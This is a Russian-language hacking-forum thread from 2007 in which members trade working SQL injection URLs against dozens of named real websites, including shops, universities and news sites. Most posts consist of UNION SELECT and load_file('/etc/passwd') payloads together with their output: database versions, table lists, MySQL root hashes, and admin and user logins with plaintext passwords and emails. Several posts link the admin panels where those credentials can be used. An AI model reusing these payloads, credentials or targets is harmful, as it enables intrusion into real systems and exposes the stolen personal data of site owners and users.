http://forum.antichat.ru/showthread.php?t=35599

Holokost

10.11.2007, 00:46

При помощи фака раздирбанил постгресс и узнал логины:пассы... Вот только их там дохрена и самые вероятные на админку не подходят((((((

ElteRUS

10.11.2007, 01:37

http://www.samaranews.ru/work/view1.php?type_category=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x2F,version(),database(),user()),14,15,16,17,18/*

4.1.21-community-max-nt-log/1gb_samara/1gb_samara@10.0.2.2

--------------------------------------------------------------------

http://www.yes.spata.ru/index.php?a=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2,3,4/*

4.1.21-standard-log/spataru_yes/spataru_yes@localhost

--------------------------------------------------------------------

http://www.list.mini-soft.ru/full_link.php?nID=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10,11/*

4.0.18-log/minisof5_cat/minisof5_admin3@localhost

--------------------------------------------------------------------

http://www.wir1.domenonline.ru/cgi-bin/podrob.pl?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3/*

4.0.27-standard-log/wirru_wir83wir1/wirru_wir@localhost

--------------------------------------------------------------------

http://www.elfworld.ru/articles/index.php?mode=section&id=-1'+union+select+1,1,concat_ws(0x2F,cast(version()+ as+binary),cast(database()+as+binary),cast(user()+ as+binary)),1,1,1,1/*

4.0.24_Debian-10sarge2-log/erynrandir_elfw/erynrandir_elfw@localhost

K1nD[e]R

10.11.2007, 02:35

http://www.yuretz.ru/prikol.php?id=9999+union+select+1,concat_ws(0x2F,v ersion(),database(),user()),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17/*

5.0.45-community/yuretz/yuretz@localhost

===========================================
http://www.trud.ru/issue/shortnews.php?id=-64079+union+select+1,2,concat_ws(0x2F,user(),datab ase(),version()),load_file('etc/passwd/'),5,6,7/*

trudinfo@localhost/trudinfo_db/4.1.21-log

Dark[<X>]D1ablo

10.11.2007, 03:01

http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),database( )%20,user()),2,3,4,5,6,7/*

FoxMALDER

10.11.2007, 03:04

anti-crime.org - Антикримінальний вибір
4.1.20:akv@localhost:usrdb_extaxobh_testakv
http://www.anti-crime.org/search.php?avtor=-1'+union+select+1,2,3,4,concat(version(),char(58), user(),char(58),database()),6,7/*
Есть таблицы:
grani_main (ni, podvodka, st_type, tmstamp, zag, avtor, is_public)
akv_forum
party
P.S.: К сожалению нет доступа к базам mysql и information_schema :mad:

Dark[<X>]D1ablo

10.11.2007, 03:20

http://www.lyapis.com/articles.php?id=-138+union+select+1,2,DATABASE(),USER(),VERSION(),6 ,7,8,9/*

То что таблицы не нашёл не судить, завтра попытаюсь отыскать.

FoxMALDER

10.11.2007, 03:33

D1ablo']То что таблицы не нашёл не судить, завтра попытаюсь отыскать.

news
albums
articles

http://www.lyapis.com/photo.php?cl=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/albums.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*

Админка с Basic'ом http://www.lyapis.com/admin/ :mad:

P.S.: Теперь остался форум. И не исключено, что база называется lyapis_forum... :)

K1nD[e]R

10.11.2007, 03:36

http://www.rabota-omsk.info/comment.php?ID=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5+from+users/*

5.0.22/jobsmarket_omsk/jobsmarket_job@localhost

-MoLoToK-

10.11.2007, 03:41

http://www.vip-electronic.ru/index.php?productID=688+union+select+1,2,3,4/*
vipelect_vp@localhost

KEHT33

10.11.2007, 04:14

http://www.pronline.ru/gospriemka.php?letter=-8+UNION+SELECT+1,2,3,4,5,6,7+From+phpads_clients/*
БД 4

http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11/*

БД 5

http://www.gallery-a.ru/expo/index.php?expo=HERZEN&room=expo&leaf=000035%20union%20select%201,name+FROM+users/*

БД 4

FoxMALDER

10.11.2007, 05:15

aker.com.ua - Научно-производственная компания "АКЕР"
4.1.21-standard-logaker_akeraker_aker@localhost
http://aker.com.ua/index.php?pageid=-1+union+select+1,2,3,concat_ws(0x05,version(),data base(),user()),5,6,7,8,9,10,11,12
http://aker.com.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x05,version(),data base(),user()),5,6,7,8
Таблицы:
aimglib_files (id, nshows, groupid, date)
aadm_menu
anews_news
picture_amount

FoxMALDER

10.11.2007, 08:24

arsenal.kharkov.ua - ФК "Арсенал"
4.0.21-logarsenalarsenal@localhost
http://www.arsenal.kharkov.ua/archive.phtml?id_rubric=1&id_rubric2=-1+union+select+1,2,3,4,5,concat_ws(0x05,version(), database(),user()),7,8,9,10,11,12/*
users (id, password, email, country, city)
vote
P.S.: Столбик пользователя не нашел... :(

Solide Snake

10.11.2007, 12:37

www.ceethree.us

http://www.ceethree.us/comments.php?ID=-2633+union+select+convert(user+using+latin1),2,pas sword,4,5,6,7,8,9,10,11,12+from+mysql.user/*

Elvis000

10.11.2007, 12:45

Журнал Системный Администратор av5.com

http://av5.com/?action=jns,read,choose_issue&journalid=1&choose_year=-1+union+select+1/*

одна колонка, где выводится информация не нашел.

10.11.2007, 13:55

_http://www.petsby.com/articles.php?id=22+union+select+1,2,3,4,5/*
_http://www.petsby.com/articles.php?id=-22+union+select+1,2,version(),4,5/*

================================================== ========================
Tables:

_cities
accaunts
61636361756e7473
accaunts3
61636361756e747333
================================================== =========================
_http://www.petsby.com/articles.php?id=-22+union+select+1,2,column_name,4,5+from+informati on_schema.columns+where+table_name=0x61636361756e7 473+limit+1,1
patronymic_name
password
_http://www.petsby.com/articles.php?id=-22+union+select+1,2,concat_ws(0x3a,patronymic_name ,password),4,5+from+accaunts3
================================================== =========================
shnyga:shnyga
================================================== =========================

big_BRAT

10.11.2007, 15:11

http://www.oneway-uk.com/ Аукцион

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat_ws(0 x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7--
4.1.15-Debian_1-log:oneway:root@oneway.oneway.co.nz

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(user ,0x3a,password),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+fr om+mysql.user+limit+0,1--
root:74e47d975f1a9f72:stiltskin
debian-sys-maint:0c1b789c7af5d9ca

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+concat(pass word,0x3a,email),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+f rom+member+limit+1,1--
...
dvtamde7:dmay66@xtra.co.nz
....

http://www.oneway-uk.com/categorylist.php?cat=2996+uniOn+selEct+load_file(0 x2f6574632f706173737764),2,3,4,5,6,7,8,9,0,1,2,3,4 ,5,6,7--

интересные файлы для инклуида и изучения
/var/www/protected/includes/memberarchive.inc
/var/www/protected/includes/auction.inc
/var/www/protected/includes/ledger.inc
/var/www/protected/includes/profile.inc
/var/www/protected/includes/store.inc
/var/www/protected/includes/alert.inc
/var/www/protected/includes/team.inc
/var/www/protected/includes/stats.inc

KEHT33

10.11.2007, 17:58

http://edu.ascon.ru/order.php?id=-34+UNION+SELECT+1,2,concat(username,0x2c,userpass) ,4,5+FROM+poll_user/*
БД 5
admin:81dc9bdb52d04dc20036dbd8313ed055:1234

Mike 007

10.11.2007, 19:11

www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order=
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'

Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Объясните что делать дальше, можете даже снять видео про взлом этого сайта =)

KEHT33

10.11.2007, 19:21

Интернет-маркетинг и раскрутка сайтов
http://www.vanta.ru/script/catalog.php?cat=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
БД 4
Если кто найдёт таблицы....отпишитесь

fRg

10.11.2007, 21:09

brahms.rohttp://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ae s_decrypt(aes_encrypt(version(),0x71),0x71),aes_de crypt(aes_encrypt(database(),0x71),0x71),aes_decry pt(aes_encrypt(user(),0x71),0x71)),11,12,13/* 4.1.12:b2:root@localhost
А дальше нужна подсказка...
Почему-то можно посмотреть user из mysql.user:http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_e ncrypt(user,0x71),0x71),11,12,13+from+mysql.user+l imit+1,1/* но ничего не отображается в поле password:http://www.brahms.ro/produse/detalii.php?cat=15&sub=72&produs=-1+union+select+1,2,3,4,5,6,7,8,9,aes_decrypt(aes_e ncrypt(password,0x71),0x71),11,12,13+from+mysql.us er+limit+1,1/* неужели нет пароля на рута..?!

l-l00K

10.11.2007, 21:20

quickgifts.com
version: Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
db_name: dbLogins
user: qglogin
В поле email:
1' or 1=(SELECT TOP 1 password FROM tblusers)--
email: dshifley@quickgifts.com
password: ZHNoaWZsZXk=
Или так:
email: ' or 1=1--
password: любой

whalesdirect.com
http://www.whalesdirect.com/product.html?t_q=FT305'+union+select+1,2,3,4,5,6,7 ,8,9,concat_ws(char(58),email,password),11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32+from+users+--+
4.1.20:crt@localhost:whalesdirect_com

email:steve@tshirtriot.com
password:h0bbes
Куда вводить не нашел

FoxMALDER

10.11.2007, 22:04

mdgu.com.ua - Мариупольский Государственный Гуманитарный Университет
5.0.27-standard-logmdgu2006_mdgumdgu2006_mdgu@localhost
http://www.mdgu.com.ua/ua/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x05,version(),da tabase(),user()),6,7,8,9/*
То что нашел... :)
news
photogallery
rectorat
faculty
specialty
profkom
professors
administration
links_univer
links
elpublic
lang
Таблицу пользователей не нашел, а админка тут (http://www.mdgu.com.ua/admin/).

K1nD[e]R

10.11.2007, 22:09

http://zvezda.ru/file.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F, version(),database(),user()),11/*

4.1.20/zvezdaDB/webuzer@localhost

v1ru$

10.11.2007, 22:17

http://k-parts.ru/index.php?actions=yes&id=-8+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4/*

4.0.18-log:elitron9_test:elitron9_elitron@localhost

http://www.webtel.ru/spec.php?table=phones&id=-745'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(u ser(),0x3a,database(),0x3a,version()),13,14,15,16, 17/*

webtel@localhost:webtel:4.1.18

http://www.mtas.ru/second.php?ID=-29+union+select+aes_decrypt(aes_encrypt(concat_ws( 0x3a,user(),database(),version()),0x3a),0x3a)/*

mtas116_site@localhost:mtas116_site:4.1.15-nt

FoxMALDER

10.11.2007, 23:15

donntu.edu.ua - Донецкий национальный технический университет
4.0.24-logCountercounter@localhost.localdomain
http://donntu.edu.ua/russian/intas/statistics/statistic.php?id=-1)+union+select+1,concat_ws(0x05,version(),databas e(),user()),3/*

fobofob

11.11.2007, 01:43

Сайты разработки студии 8000.ru

http://piroclub.ru/product_full.php?id=-3068+union+select+1,2,concat(name,0x3a,login,0x3a, password,0x3a,email),4,5+from+users/*&group_id=122
_________________________________

http://www.piro.ru/news_details.php?id=-89+union+select+1,2,concat_ws(0x3a,id,name,login,p assword,email),4,5,6+from+users+limit+0,1/*
_________________________________

http://www.ibercork.ru/news.php?id=-34+union+select+1,2,concat(login,0x3a,pass,0x3a,ip )+from+my8pref_adm_usr+limit+0,1/*
ibercork:ibercork
_________________________________

http://www.gelionn.ru/subcatalog.php?id=-83+union+select+1,concat(table_name,0x3a,column_na me),3+from+information_schema.columns/*
_________________________________
http://www.sbaspect.ru/pages/?parent=37&id=43&sub=-102+union+select+1,concat(login,0x3a,pass,0x3a,ip) +from+my8pref_adm_usr+limit+0,1/*&name=
admin:5c5fd0f154926edd45f17f9e5064940e
sbadmin:123
seo:f2f9364e99cad8adc315a13c2f00a922

}{0TT@БЬ)Ч

11.11.2007, 01:46

http://services.rol.ru/portal/site/start/menuitem.85bccd817d90ed8faea08a10b751342c/?articleid=-117+union+select+1,2,3,4,5,6,7+from+users/*

fobofob

11.11.2007, 01:50

продолжение...

http://www.avtovector.ru/service.php?id=-5+union+select+1,table_name+from+information_schem a.tables/*
_________________________________

http://soft.su/?pages_id=4&supplier=-22+union+select+1,2,concat_ws(0x3a,user_login,user _password,user_email),4,5+from+cls_users+limit+1,1/*
админ clite:clite
_________________________________
http://moy-dom.ru/katalog/?action=show_f&id=-3395+union+select+1,2,3,4,table_name,6+from+inform ation_schema.tables/*

_________________________________

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,pass),5,6 ,7,8+from+bestsport_2.my8pref_adm_usr+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(login,0x3a,password) ,5,6,7,8+from+users+limit+0,1/*

fobofob

11.11.2007, 01:54

далее...

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat_ws(0x3a,first_name,l ast_name,email,login,password,patronymic),5,6,7,8+ from+bestsport_2.members+limit+0,1/*

http://www.pingpong.su/conference/see.php?id=-848+union+select+1,2,3,concat(username,0x3a,user_p assword,0x3a,user_email,0x3a,user_icq),5,6,7,8+fro m+phpbb_pingpong_users+limit+1,1/*

Админ на форуме kungpo:alex5

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,pwd),4,5+f rom+aut_users+limit+2,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,name,login ,password,phone,city,address),4,5+from+book_users+ limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+conf_users+limit+0,1/*

________________________________

код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,login,password,e mail),4,5+from+forum_users+limit+0,1/*

halkfild

11.11.2007, 02:03

bіgmіr.net

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=25+and+1=1/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,6 5,66,67,68,69,70,71,72,73,74,75,76,77,78/*'

http://mystery.bіgmіr.net/game/frames/userdetails.php?id=-25+union+select+1,CONCAT_WS(0x3A,VERSION(),USER%20 (),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78/*'

5.0.45-log:mysterygame@localhost:mystery

p.s. бага недавно исправлена

з.з.ы. у меня сегодня 2 года реге на ачате УРЯ!!!

fobofob

11.11.2007, 02:07

Едем дальше...
________________________________

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,email,login,pass word,pages,info),4,5+from+page_users+limit+0,1/*

________________________________
код:

http://www.kniga.su/info.php?id=-1+union+select+1,2,concat_ws(0x3a,id,email,passwor d,phone,org,contact,name,occupation,sphere),4,5+fr om+users+limit+0,1/*
________________________________
код:

http://www.superagent.ru/news.php?act=one&nid=-185+union+select+1,2,3,4,concat(table_name,0x3a,co lumn_name)+from+information_schema.columns/* сразу все таблы и колонки.

________________________________
http://www.7000.ru/company/news_details.php?id=-327+union+select+1,2,3,concat_ws(0x3a,email,icq,lo gin,password),5,6+from+7000_stuff_users+limit+0,1/*
________________________________
а это виновник всего :)

http://www.8000.ru/new.php?otd=dis&idm=14+union+select+1,2,3,4,5,6/*&id=21 вывод в исходнике
Прошу прощения что в несколько постов,иначе не смог-браузер телефона не позволяет

Dark[<X>]D1ablo

11.11.2007, 02:20

http://www.happyland.ru/brands.php?id=-2+union+select+1,DATABASE(),3,VERSION(),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29/*
дальше не захотел продолжеть с этим ресурсом, так как компания не малая не хочется проблем...

http://www.fostas.ru/library/show_article.php?id=-103+union+select+1,2,database()/*

http://www.t-dsk.ru/index.php?id=-7+union+select+1,database(),3/*

fobofob

11.11.2007, 02:21

Там еще много сайтов которые можно раскрутить на скуль инъекцию ;)
,портфолио главного героя со списком сайтов:
lazarevich.info/portfolio/two/print

FoxMALDER

11.11.2007, 03:06

Астера - коммерческая недвижимость
5.0.45atlanticspbsuatlanticspbsu@81.177.16.61
http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,version(),database( ),user()),2/*
http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,TABLE_SCHEMA,TABLE_ NAME,COLUMN_NAME),2+from+information_schema.column s+limit+1/*
DB: atlanticspbsu
analitic_cat
analitic_cat_en
analitic_files
analitic_files_en
category
classes
dictionary
down_categories
down_files
eng_news
estate_cat
estate_contact
estate_descr_en
estate_descr_ru
estate_obj_type
estate_pic
estate_razd_type
estate_region
investment_ru
maillist
maillistt
mainmenu
modules
omenu
prjterms_cat
prjterms_list
projects
projects_area
projects_descr_en
projects_descr_ru
projects_pic
projects_region
realtypic
realtyrent
regions
rus_news
static
users (id,firstname,lastname,user_id,pwd,group_id,status ,dt)
users_group_cat (gid,group_name)
DB: atlanticspbsu_1
CLASSES
DICTIONARY
ELEMENTS
IMAGES
OBJECTS
PAGES
PAGE_INFO
PAGE_PARAMS
PAGE_PARTS
PAGE_PART_INFO
PAGE_PARTS_PARAMS
PARAMS
REVIEWES
SITES
TEMPLATES
TEMPLATE_PARAM_TYPES
Админка тут (http://www.asteragroup.ru/admin/) , а админа пасс ниже... :cool: http://www.asteragroup.ru/?cid=3&sid=-28+union+select+concat_ws(0x05,user_id,pwd),2+from +users/*

P.S.: Бонус - здесь (http://www.asteragroup.ru/files/analitic/spb.php) ... ;)
P.P.S.: Чуть не забыл, результат в title выводится! :p

FoxMALDER

11.11.2007, 03:40

5.0.45-logsdporgu_frinetuasdporgu_fri@localhost
http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,concat_ws(0x05,version(),databa se(),user()),4,5,6,7,8,9,10,11,12/*
http://www.fri.net.ua/loadnews.php?id=-1+union+select+1,2,concat_ws(0x05,TABLE_SCHEMA,TAB LE_NAME,COLUMN_NAME),4,5,6,7,8,9,10,11,12+from+inf ormation_schema.columns+limit+0,1/*

-MoLoToK-

11.11.2007, 06:54

Внимание лицам не достигшим 18 лет просматривать данную скулю не рекомендуется)))

Скуля
http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Mysql.user
http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,password,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+fr om+mysql.user/*
user:Pass
-----------------------
http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,user,10,11,12,13,1 4,password,16,17,18,19,20,21,22,23,24,25,26,27,28+ from+mysql.user/*
root:*111921C1B9EE2D4BD4C825031689DCD63239883F
-----------------------
http://pornoshara.com/item.php?tid=-1'+union+select+1,2,3,4,5,6,7,8,password,10,11,12, 13,14,convert(concat(load_file(0x2f6574632f7061737 37764)),binary),16,17,user,19,20,21,22,23,24,25,26 ,27,28+from+mysql.user+limit+2,1/*

Elvis000

11.11.2007, 13:57

Лесная промышленность
www.woodpages.ru

http://www.woodpages.ru/rubrik.php?param=news2&id_com=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x 71),0x71),3,4,5,6,7,8,9,10/*

user:oilpagesru@localhost
version:4.1.15-log
base:oilpagesru_wood

KEHT33

11.11.2007, 16:28

http://www.wapnet.pl/comment.php?what=news&id=16+UNION+SELECT+1,2,concat(nick,0x2b,pass,0x2b, icq),4,5,6,7,8,9,10,11,12+from+users/*
http://www.wapnet.pl/comment.php?what=news&id=16+UNION+SELECT+1,2,pass,4,5,6,7,8,9,10,11,12+f rom+admins/*
rambo8:aeb499f90812d76a658cb992513ace90:pleple
robak:aeb499f90812d76a658cb992513ace90:pleple
bibiak:d64773c962c978417cd6b9112064dbf7

админка
http://www.wapnet.pl/admin.php

groundhog

11.11.2007, 18:10

Уязвимость на http://www.cotka.ru/. Крупный онлайн портал по покупке/продаже сотовых телефонов и аксессуаров.

http://www.cotka.ru/BS/view.asp?nm=2465)+OR+1=@@version+--+&nr=162
http://www.cotka.ru/BS/view.asp?nm=2465)+OR+1=@@servername+--+&nr=162
Поиск по таблицам:

http://www.cotka.ru/BS/view.asp?nm=2465)+or+1=(select+top+1+table_name+fr om+information_schema.tables+where+table_name+not+ in+('NastrSet','NastrPhones','NastrList','TV_Progr am','Users_contacts','Accessuars','accessuars_name ','Hard','AllBase','History_Archive','AllPhone','A rchive','Black_List','City','Instr','Constants','s essions','Credits','sessions_keys','Disp_Right','G lossary','TV_Picture','GuestBook','History','Jurna l','TV_Mistake','Jurnal_CFG','TV_Announce','Pictur es','Mailer','Statii','Mailer_Log','Mistakes','Mon ey','Sotovik_Err','Digital_Tech','Operators','Page rs','Phones_S','RestrictedPhones','TreeList','Rait ing_Model','Raiting_Model_List','Right_List','dtpr operties','Subject','OperatorsGSM','temp_archive', 'listcity','Users_list','Subject_Site','Nastr','Fa stOff','city_codes','TV_Announce_buf','ForbiddenPh ones','codes_city','tv_temp','TV_Kanal','Statii_Ru b','stoplist','Phones_from_IRR'))+--+&nr=162
Интересные таблицы: Users_contacts (контактные данные пользователей), Credits (информация по кредитам пользователей), Users_list (учётные данные пользователей).

Поиск по полям в Credits:

http://www.cotka.ru/BS/view.asp?nm=2465)+or+1=(select+top+1+column_name+f rom+information_schema.columns+where+table_name='C redits'+and+column_name+not+in+('id','num_credit', 'Active','addr','Address','AddZagolText','algorith m','Alias_Rub','allphone','Announce_id','Announce_ Text','Answer','auid','Author','backuplsn','BegDat a','binary_message_body','bitlength','bitposint',' bitposleaf','brkrins','brkrinst','Cast_List','CD_D VD','cert','chk','City','city_cod','city_name','cl ass','CName','Cnt','colid','collationid','compid', 'contact_address','contact_backwww','contact_city' ,'contact_email','contact_family','contact_howname ','contact_icq','contact_name','contact_org','cont act_otche','contact_phone','contact_phone2','conta ct_phone2cod','contact_phonecod','contact_type','c ontact_www','contract','conversation_group_id','co nversation_handle','convgroup','Country','country_ cod','country_name','CPU','created','createlsn','c redit','Credit_Flag','crend','crerrors','crrows',' crschver','crstart','crtsnext','crtype','crypto',' CurDay','Data','dataspace','Date','Date_Add','Date _Last','dbid','defval','depid','depsubid','deriv', 'Description','dflt','dfltsch','diagid','diffbaseg uid','diffbaselsn','diffbaseseclsn','diffbasetime' ,'Disp','Disp_Flag','dlgerr','dlgid','dlgopened',' dlgtimer','docid','droplsn','DT','DTEnd','E_Mail', 'EMail','EMailAnswer','Empty','encrtype','enddlgse q','enqtime','enum','Err','Etalon'))+--+&nr=162
Поиск по полям в Users_list:

http://www.cotka.ru/BS/view.asp?nm=2465)+or+1=(select+top+1+column_name+f rom+information_schema.columns+where+table_name='U sers_list'+and+column_name+not+in+('user_id','user _active','username','user_password','user_session_ time','user_last_visit','user_email','Active','add r','Address','AddZagolText','algorithm','Alias_Rub ','allphone','Announce_id','Announce_Text','Answer ','auid','Author','backuplsn','BegData'))+--+&nr=162
Логин:хеш-пароля (походу MD5):

http://www.cotka.ru/BS/view.asp?nm=2465)+or+1=(select+top+1+username%2B': '%2Buser_password+from+Users_list+where+username+n ot+in+'Guest')+--+&nr=162

fRg

11.11.2007, 19:17

joburionline.rohttp://www.joburionline.ro/catalog.php?cat=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9/* 1. 4.1.22-standard-log:joburion_joburi:joburion_user@localhost

perlasuferintei.rohttp://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12/* 4.0.27-standard:perla_perlasuferintei:perla@localhost

reklamni-predmety.namehttp://www.reklamni-predmety.name/catalog.php?cat=5&subcat=60&brand=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12/* 5.0.22-Debian_0ubuntu6.06.2:reklamni-predmety5695:reklamni-pre5695@localhost

delay(0)

11.11.2007, 19:33

e-shop

http://www.semicom.lv/

Users:
http://www.semicom.lv/index.php?page=list&l1=81+union+select+1,2,3,4,5,6,concat_ws(0x3a,name ,pass,email),8,9,1+from+users+limit+0,1/*

Admins:
http://www.semicom.lv/index.php?page=list&l1=81+union+select+1,2,3,4,5,6,concat(login,0x3a,p wd),8,9,1+from+admins+limit+0,1/*

http://www.semicom.lv/admin.php
semicom : plokij123

FoxMALDER

11.11.2007, 21:32

Ауди Центр Витебский - официальный дилер Audi в Санкт-Петербурге
4.1.21-logdb0013135000131350@localhost
http://www.audi-vitebskiy.ru/index/experience/index/experience/index/experience/index.php?ob=class2&idclass=-10+union+select+1,2,concat_ws(0x05,version(),datab ase(),user()),4,5,6,7,8,9,10,11/*
di_bodytype
di_carclass
di_carclassgallery
di_carmodel
di_carmodelparam
di_carmodelspec
news

v1ru$

11.11.2007, 22:37

что мне невезёт на 5й мускул(
Везде 4й мускул

http://sanotdel.ru/php/shoper_view.php3?id=180+UNION+SELECT+1,2,3,4,AES_D ECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x 3a,database(),0x78),0x78),6,7,8,9,10,11,12,13,14,1 5,16/*

http://asv.spb.ru/?id=-16+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(v ersion(),0x3a,user(),0x3a,database(),0x78),0x78),0 x78)/*

http://top.apic.ru/index.cgi?Template=description&Id=-6484+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),database(),user()),12,13,14,15,16,17 ,18,19,20/*

KEHT33

11.11.2007, 22:56

http://www.dlugosiodlo.pl/module.php?op=art&topic=-6+UNION+SELECT+1,concat(id,0x2b,nick,0x2b,pass,0x2 b,icq),3,4,5+from+users+limit+0,1/*
БД 4

http://www.wolnykraj.info/infopage.php?id=-6+UNION+SELECT+1,2,concat(nick,0x2b,pass),4,5,6,7+ from+r_users/*
БД 5 ещё интересная таблица wolny_admins и wolny_users

Dark[<X>]D1ablo

12.11.2007, 01:54

http://www.business-academy.ru/viezd.php?id=-11+union+select+1,database(),3,user(),5/*

названия таблиц по ходу дела косые....

http://www.ayda.ru/hotels/show_country.php?id=-2+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13, 14,15,16/*

version mysql 5.0.37

KEHT33

12.11.2007, 02:06

D1ablo']http://www.business-academy.ru/viezd.php?id=-11+union+select+1,database(),3,user(),5/*

названия таблиц по ходу дела косые....
Там 5 скул....базы мона прочитать ) их 125...но та которую ты я думаю ищешь ibf_members

K1nD[e]R

12.11.2007, 04:28

http://www.surcon.ru/pages.php?id=13+union+select+1,concat_ws(0x2F,vers ion(),user(),database()),concat_ws(0x2F,login,pass word,id),4,5+from+users/*

Данные: 4.0.25-standard/vodos68_admin@web2.100mb.net/vodos68_surcon

Админки

Login: admin | Password: 1222appex
Login: seva | Password: 123456
Login: sdg34 | Password: 123542

K1nD[e]R

12.11.2007, 05:43

http://www.shark.ru/page.php?id=-16+union+select+1,2,convert(concat(load_file(0x2f6 574632f706173737764)),binary),concat_ws(0x2F,user( ),version(),database()),5,6,7,8,9,10+from+mysql.us er/*

Данные: root@localhost/4.0.22-standard/sharkid

root*

fRg

12.11.2007, 09:48

vel-bg.comhttp://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,version(),database() ,user())/* 5.0.45-community-log:velbgc_chinafood:velbgc_root@localhost

37 таблиц:http://www.vel-bg.com/catalog.php?cat=-1+union+select+table_name+from+information_schema. tables+limit+36,1/*
4 root-a:http://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,USER_NAME,PASS,NAME) +from+users+limit+3,1/*
USER_NAME:PASS:NAME

vesi:*8BB36E3127C76C9AD9FBD075975489D08E1C5B44:в� �си
svetlio:*4A59E59650A8409075084B2048625BD1BE8711A8: Светльо
kami:*032197AE5731D4664921A6CCAC7CFCE6A0698693:к� �ми
sasho:*DEE38E52FC4DD0B60096749662F3F76F2BE8E0AA:с ашо

KEHT33

12.11.2007, 09:56

http://gimnazjum4.edu.tubaza.net/comment.php?what=news&id=378+UNION+SELECT+1,2,pass,4,5,6,7,nick,9+FROM+a dmins+limit+2,1/*
БД 5.

K1nD[e]R

12.11.2007, 16:16

http://www.paintball.ru/next.php?id=999+union+select+1,2,concat_ws(char(58 ,58),id,pass,username)+from+pb_users+where+id=1/*

Админов море вот 2 главных...

APG - Передовая пароль kr3Bx
Черная Метка пароль 953z6

K1nD[e]R

12.11.2007, 18:51

